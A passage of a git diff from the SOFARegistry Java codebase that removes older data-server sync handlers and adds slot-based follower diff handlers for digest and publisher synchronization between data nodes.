processDatum(datum); - dataChangeEventCenter.sync(DataChangeTypeEnum.MERGE, - dataSourceTypeEnum, datum); - } - } - } else { - LOGGER.info("[SyncDataCallback] get no syncDatas"); - } - } - } - } - - private void processDatum(Datum datum) { - if (datum != null) { - Map publisherMap = datum.getPubMap(); - - if (publisherMap != null && !publisherMap.isEmpty()) { - publisherMap.forEach((registerId, publisher) -> Publisher.processPublisher(publisher)); - } - } - } - - @Override - public void onException(Throwable e) { - GenericResponse genericResponse = new GenericResponse(); - genericResponse.fillFailed(e.getMessage()); - onResponse(genericResponse); - } - - @Override - public Executor getExecutor() { - return EXECUTOR; - } - - /** - * Getter method for property connection. - * - * @return property value of connection - */ - public Connection getConnection() { - return connection; - } - - /** - * Getter method for property request. - * - * @return property value of request - */ - public SyncDataRequest getRequest() { - return request; - } - - /** - * Getter method for property retryCount. - * - * @return property value of retryCount - */ - public int getRetryCount() { - return retryCount; - } - - /** - * Setter method for property retryCount. - * - * @param retryCount value to be assigned to property retryCount - */ - public void setRetryCount(int retryCount) { - this.retryCount = retryCount; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/DataSyncServerConnectionHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/DataSyncServerConnectionHandler.java deleted file mode 100644 index 3519b398e..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/DataSyncServerConnectionHandler.java +++ /dev/null @@ -1,72 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerConnectionFactory; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class DataSyncServerConnectionHandler extends AbstractServerHandler { - @Autowired - private DataServerConnectionFactory dataServerConnectionFactory; - - @Override - public ChannelHandler.HandlerType getType() { - return ChannelHandler.HandlerType.LISENTER; - } - - @Override - public void connected(Channel channel) throws RemotingException { - super.connected(channel); - dataServerConnectionFactory.register(((BoltChannel) channel).getConnection()); - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - super.disconnected(channel); - dataServerConnectionFactory.remove(((BoltChannel) channel).getConnection()); - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } - - @Override - public void checkParam(Object request) throws RuntimeException { - - } - - @Override - public Object doHandle(Channel channel, Object request) { - return null; - } - - @Override - public Object buildFailedResponse(String msg) { - return null; - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/FetchDataHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/FetchDataHandler.java deleted file mode 100644 index 76c9c0b33..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/FetchDataHandler.java +++ /dev/null @@ -1,68 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; - -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.GetDataRequest; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractClientHandler; -import com.alipay.sofa.registry.util.ParaCheckUtil; - -import java.util.Map; - -/** - * processor to get specific data - * - * @author qian.lqlq - * @version $Id: GetDataProcessor.java, v 0.1 2017-12-01 15:48 qian.lqlq Exp $ - */ -public class FetchDataHandler extends AbstractClientHandler { - - @Override - public void checkParam(GetDataRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "GetDataRequest.dataInfoId"); - } - - @Override - public Object doHandle(Channel channel, GetDataRequest request) { - return new GenericResponse>().fillSucceed(DatumCache - .getDatumGroupByDataCenter(request.getDataCenter(), request.getDataInfoId())); - } - - @Override - public GenericResponse> buildFailedResponse(String msg) { - return new GenericResponse>().fillFailed(msg); - } - - @Override - public Class interest() { - return GetDataRequest.class; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyDataSyncHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyDataSyncHandler.java deleted file mode 100644 index 5938070bb..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyDataSyncHandler.java +++ /dev/null @@ -1,131 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.NotifyDataSyncRequest; -import com.alipay.sofa.registry.common.model.dataserver.SyncDataRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.bolt.BoltChannel; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.remoting.dataserver.GetSyncDataHandler; -import com.alipay.sofa.registry.server.data.remoting.dataserver.SyncDataCallback; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractClientHandler; -import com.alipay.sofa.registry.server.data.util.ThreadPoolExecutorDataServer; -import com.alipay.sofa.registry.util.NamedThreadFactory; -import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.concurrent.ArrayBlockingQueue; -import java.util.concurrent.Executor; -import java.util.concurrent.ThreadPoolExecutor; -import java.util.concurrent.TimeUnit; - -/** - * - * @author qian.lqlq - * @version $Id: NotifyDataSyncProcessor.java, v 0.1 2018-03-06 20:04 qian.lqlq Exp $ - */ -public class NotifyDataSyncHandler extends AbstractClientHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger(NotifyDataSyncHandler.class); - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private GetSyncDataHandler getSyncDataHandler; - - @Autowired - private DataChangeEventCenter dataChangeEventCenter; - - private Executor executor = ExecutorFactory.newFixedThreadPool(10, - NotifyDataSyncHandler.class.getSimpleName()); - - private ThreadPoolExecutor notifyExecutor; - - @Override - public void checkParam(NotifyDataSyncRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "request.dataInfoId"); - } - - @Override - public Object doHandle(Channel channel, NotifyDataSyncRequest request) { - final Connection connection = ((BoltChannel) channel).getConnection(); - executor.execute(() -> { - String dataInfoId = request.getDataInfoId(); - String dataCenter = request.getDataCenter(); - Datum datum = DatumCache.get(dataCenter, dataInfoId); - Long version = (datum == null) ? null : datum.getVersion(); - Long requestVersion = request.getVersion(); - if (version == null || requestVersion == 0L || version < requestVersion) { - LOGGER.info( - "[NotifyDataSyncProcessor] begin get sync data, currentVersion={},request={}", version, - request); - getSyncDataHandler - .syncData(new SyncDataCallback(getSyncDataHandler, connection, new SyncDataRequest(dataInfoId, - dataCenter, version, request.getDataSourceType()), dataChangeEventCenter)); - } else { - LOGGER.info( - "[NotifyDataSyncHandler] not need to sync data, version={}", version); - } - }); - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public Class interest() { - return NotifyDataSyncRequest.class; - } - - @Override - public Executor getExecutor() { - if (notifyExecutor == null) { - notifyExecutor = new ThreadPoolExecutorDataServer("NotifyDataSyncProcessorExecutor", - dataServerBootstrapConfig.getNotifyDataSyncExecutorMinPoolSize(), - dataServerBootstrapConfig.getNotifyDataSyncExecutorMaxPoolSize(), - dataServerBootstrapConfig.getNotifyDataSyncExecutorKeepAliveTime(), - TimeUnit.SECONDS, new ArrayBlockingQueue<>( - dataServerBootstrapConfig.getNotifyDataSyncExecutorQueueSize()), - new NamedThreadFactory("DataServer-NotifyDataSyncProcessor-executor", true)); - } - return notifyExecutor; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyFetchDatumHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyFetchDatumHandler.java deleted file mode 100644 index cb11bf076..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyFetchDatumHandler.java +++ /dev/null @@ -1,193 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.dataserver.GetDataRequest; -import com.alipay.sofa.registry.common.model.dataserver.NotifyFetchDatumRequest; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.DataServerCache; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.change.DataChangeTypeEnum; -import com.alipay.sofa.registry.server.data.change.DataSourceTypeEnum; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.remoting.dataserver.DataServerConnectionFactory; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.server.data.util.TimeUtil; -import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Map; -import java.util.Map.Entry; - -/** - * - * @author qian.lqlq - * @version $Id: NotifyFetchDatumProcessor.java, v 0.1 2018-04-29 15:10 qian.lqlq Exp $ - */ -public class NotifyFetchDatumHandler extends AbstractServerHandler { - - private static final Logger LOGGER = LoggerFactory - .getLogger(NotifyFetchDatumHandler.class); - - @Autowired - private DataServerCache dataServerCache; - - @Autowired - private DataServerConnectionFactory dataServerConnectionFactory; - - @Autowired - private DataChangeEventCenter dataChangeEventCenter; - - @Autowired - private DataServerConfig dataServerConfig; - - @Autowired - private Exchange boltExchange; - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Override - public void checkParam(NotifyFetchDatumRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getIp(), "ip"); - } - - @Override - public Object doHandle(Channel channel, NotifyFetchDatumRequest request) { - ParaCheckUtil.checkNotBlank(request.getIp(), "ip"); - Map> versionMap = request.getDataVersionMap(); - long version = request.getChangeVersion(); - String ip = request.getIp(); - if (version >= dataServerCache.getCurVersion()) { - if (versionMap.isEmpty()) { - LOGGER - .info( - "[NotifyFetchDatumHandler] get changeVersion map is empty,change version is {},current version is {},ip is {}", - version, dataServerCache.getCurVersion(), ip); - dataServerCache.synced(version, ip); - } else { - ExecutorFactory.getCommonExecutor().execute(() -> { - for (Entry> dataCenterEntry : versionMap.entrySet()) { - String dataCenter = dataCenterEntry.getKey(); - Map map = dataCenterEntry.getValue(); - for (Entry dataInfoEntry : map.entrySet()) { - String dataInfoId = dataInfoEntry.getKey(); - Datum datum = DatumCache.get(dataCenter, dataInfoId); - if (datum != null) { - long inVersion = dataInfoEntry.getValue(); - long currentVersion = datum.getVersion(); - if (currentVersion > inVersion) { - LOGGER.info( - - "[NotifyFetchDatumHandler] ignore fetch because changeVersion {} is less than {},dataInfoId={},dataCenter={}", - inVersion, currentVersion, dataInfoId, dataCenter); - continue; - } else if (datum.getVersion() == dataInfoEntry.getValue()) { - //if version same,maybe remove publisher all by LocalDataServerCleanHandler,so must fetch from other node - if (!datum.getPubMap().isEmpty()) { - continue; - } - } - } - fetchDatum(ip, dataCenter, dataInfoId); - } - } - dataServerCache.synced(version, ip); - }); - } - } else { - LOGGER.info( - "[NotifyFetchDatumHandler] ignore notify because changeVersion {} is less than {},ip is {}", - version, dataServerCache.getCurVersion(), ip); - } - return CommonResponse.buildSuccessResponse(); - } - - /** - * 拉取数据 - * - * @param targetIp - * @param dataCenter - * @param dataInfoId - */ - private void fetchDatum(String targetIp, String dataCenter, String dataInfoId) { - while ((dataServerCache.getDataServers(dataServerConfig.getLocalDataCenter()).keySet()) - .contains(targetIp)) { - Connection connection = dataServerConnectionFactory.getConnection(targetIp); - if (connection == null || !connection.isFine()) { - throw new RuntimeException(String.format("connection of %s is not available", - targetIp)); - } - try { - Server syncServer = boltExchange.getServer(dataServerBootstrapConfig - .getSyncDataPort()); - GenericResponse> response = (GenericResponse>) syncServer - .sendSync(syncServer.getChannel(connection.getRemoteAddress()), - new GetDataRequest(dataInfoId, dataCenter), - dataServerBootstrapConfig.getRpcTimeout()); - if (response.isSuccess()) { - Datum datum = response.getData().get(dataCenter); - if (datum != null) { - dataChangeEventCenter.sync(DataChangeTypeEnum.COVER, - DataSourceTypeEnum.BACKUP, datum); - LOGGER - .info( - "[NotifyFetchDatumHandler] fetch datum success,dataInfoId={},dataCenter={},targetIp={}", - datum.getDataInfoId(), datum.getDataCenter(), targetIp); - } - break; - } else { - throw new RuntimeException(response.getMessage()); - } - } catch (Exception e) { - LOGGER.error("[NotifyFetchDatumHandler] fetch datum error", e); - TimeUtil.randomDelay(500); - } - } - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return NotifyFetchDatumRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyOnlineHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyOnlineHandler.java deleted file mode 100644 index dd7af7408..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/NotifyOnlineHandler.java +++ /dev/null @@ -1,71 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.dataserver.NotifyOnlineRequest; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.cache.DataServerCache; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractServerHandler; -import com.alipay.sofa.registry.util.ParaCheckUtil; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author qian.lqlq - * @version $Id: NotifyOnlineProcessor.java, v 0.1 2018-04-29 14:36 qian.lqlq Exp $ - */ -public class NotifyOnlineHandler extends AbstractServerHandler { - - @Autowired - private DataServerCache dataServerCache; - - @Override - public void checkParam(NotifyOnlineRequest request) throws RuntimeException { - ParaCheckUtil.checkNotBlank(request.getIp(), "ip"); - } - - @Override - public Object doHandle(Channel channel, NotifyOnlineRequest request) { - long version = request.getVersion(); - if (version >= dataServerCache.getCurVersion()) { - dataServerCache.addNotWorkingServer(version, request.getIp()); - } - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - public Class interest() { - return NotifyOnlineRequest.class; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffDigestRequestHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffDigestRequestHandler.java new file mode 100644 index 000000000..2bdb715c1 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffDigestRequestHandler.java @@ -0,0 +1,134 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestResult; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffUtils; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.annotations.VisibleForTesting; +import java.util.Map; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-06 15:41 yuzhi.lyz Exp $ + */ +public class SlotFollowerDiffDigestRequestHandler + extends AbstractServerHandler { + private static final Logger LOGGER = + LoggerFactory.getLogger(SlotFollowerDiffDigestRequestHandler.class); + + @Autowired private ThreadPoolExecutor slotSyncRequestProcessorExecutor; + + @Autowired private DatumStorage localDatumStorage; + + @Autowired private SlotManager slotManager; + + @Override + public Object doHandle(Channel channel, DataSlotDiffDigestRequest request) { + try { + slotManager.triggerUpdateSlotTable(request.getSlotTableEpoch()); + final int slotId = request.getSlotId(); + if (!slotManager.isLeader(slotId)) { + LOGGER.warn("not leader of {}", slotId); + return new GenericResponse().fillFailed("not leader of " + slotId); + } + DataSlotDiffDigestResult result = + calcDiffResult( + slotId, + request.getDatumDigest(), + localDatumStorage.getPublishers(request.getSlotId())); + result.setSlotTableEpoch(slotManager.getSlotTableEpoch()); + return new GenericResponse().fillSucceed(result); + } catch (Throwable e) { + String msg = + StringFormatter.format("DiffSyncDigest request error for slot {}", request.getSlotId()); + LOGGER.error(msg, e); + return new GenericResponse().fillFailed(msg); + } + } + + private DataSlotDiffDigestResult calcDiffResult( + int targetSlot, + Map targetDigestMap, + Map> existingPublishers) { + DataSlotDiffDigestResult result = + DataSlotDiffUtils.diffDigestResult(targetDigestMap, existingPublishers); + DataSlotDiffUtils.logDiffResult(result, targetSlot); + return result; + } + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.DATA; + } + + @Override + public Class interest() { + return DataSlotDiffDigestRequest.class; + } + + @Override + public void checkParam(DataSlotDiffDigestRequest request) { + ParaCheckUtil.checkNonNegative(request.getSlotId(), "request.slotId"); + ParaCheckUtil.checkNotNull(request.getDatumDigest(), "request.datumDigest"); + } + + @Override + public Object buildFailedResponse(String msg) { + return new GenericResponse().fillFailed(msg); + } + + @Override + public Executor getExecutor() { + return slotSyncRequestProcessorExecutor; + } + + @VisibleForTesting + void setLocalDatumStorage(DatumStorage localDatumStorage) { + this.localDatumStorage = localDatumStorage; + } + + @VisibleForTesting + void setSlotManager(SlotManager slotManager) { + this.slotManager = slotManager; + } + + @VisibleForTesting + DatumStorage getLocalDatumStorage() { + return localDatumStorage; + } + + @VisibleForTesting + SlotManager getSlotManager() { + return slotManager; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffPublisherRequestHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffPublisherRequestHandler.java new file mode 100644 index 000000000..733e6c928 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SlotFollowerDiffPublisherRequestHandler.java @@ -0,0 +1,141 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumSummary; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffPublisherResult; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffUtils; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumStorage; +import com.alipay.sofa.registry.server.data.slot.SlotManager; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.annotations.VisibleForTesting; +import java.util.List; +import java.util.Map; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-06 15:41 yuzhi.lyz Exp $ + */ +public class SlotFollowerDiffPublisherRequestHandler + extends AbstractServerHandler { + + private static final Logger LOGGER = + LoggerFactory.getLogger(SlotFollowerDiffPublisherRequestHandler.class); + + @Autowired private ThreadPoolExecutor slotSyncRequestProcessorExecutor; + + @Autowired private DataServerConfig dataServerConfig; + + @Autowired private DatumStorage localDatumStorage; + + @Autowired private SlotManager slotManager; + + @Override + public void checkParam(DataSlotDiffPublisherRequest request) { + ParaCheckUtil.checkNonNegative(request.getSlotId(), "request.slotId"); + ParaCheckUtil.checkNotNull(request.getDatumSummaries(), "request.datumSummaries"); + } + + @Override + public Object doHandle(Channel channel, DataSlotDiffPublisherRequest request) { + try { + slotManager.triggerUpdateSlotTable(request.getSlotTableEpoch()); + final int slotId = request.getSlotId(); + if (!slotManager.isLeader(slotId)) { + LOGGER.warn("not leader of {}", slotId); + return new GenericResponse().fillFailed("not leader of " + slotId); + } + DataSlotDiffPublisherResult result = + calcDiffResult( + slotId, + request.getDatumSummaries(), + localDatumStorage.getPublishers(request.getSlotId())); + result.setSlotTableEpoch(slotManager.getSlotTableEpoch()); + return new GenericResponse().fillSucceed(result); + } catch (Throwable e) { + String msg = + StringFormatter.format( + "DiffSyncPublisher request error for slot {}", request.getSlotId()); + LOGGER.error(msg, e); + return new GenericResponse().fillFailed(msg); + } + } + + private DataSlotDiffPublisherResult calcDiffResult( + int targetSlot, + List datumSummaries, + Map> existingPublishers) { + DataSlotDiffPublisherResult result = + DataSlotDiffUtils.diffPublishersResult( + datumSummaries, existingPublishers, dataServerConfig.getSlotSyncPublisherMaxNum()); + DataSlotDiffUtils.logDiffResult(result, targetSlot); + return result; + } + + @Override + protected Node.NodeType getConnectNodeType() { + return Node.NodeType.DATA; + } + + @Override + public Class interest() { + return DataSlotDiffPublisherRequest.class; + } + + @Override + public Object buildFailedResponse(String msg) { + return new GenericResponse().fillFailed(msg); + } + + @Override + public Executor getExecutor() { + return slotSyncRequestProcessorExecutor; + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } + + @VisibleForTesting + void setLocalDatumStorage(DatumStorage localDatumStorage) { + this.localDatumStorage = localDatumStorage; + } + + @VisibleForTesting + SlotManager getSlotManager() { + return slotManager; + } + + @VisibleForTesting + void setSlotManager(SlotManager slotManager) { + this.slotManager = slotManager; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SyncDataHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SyncDataHandler.java deleted file mode 100644 index 68fd19e51..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/dataserver/handler/SyncDataHandler.java +++ /dev/null @@ -1,71 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.dataserver.handler; - -import com.alipay.sofa.registry.common.model.GenericResponse; -import com.alipay.sofa.registry.common.model.Node; -import 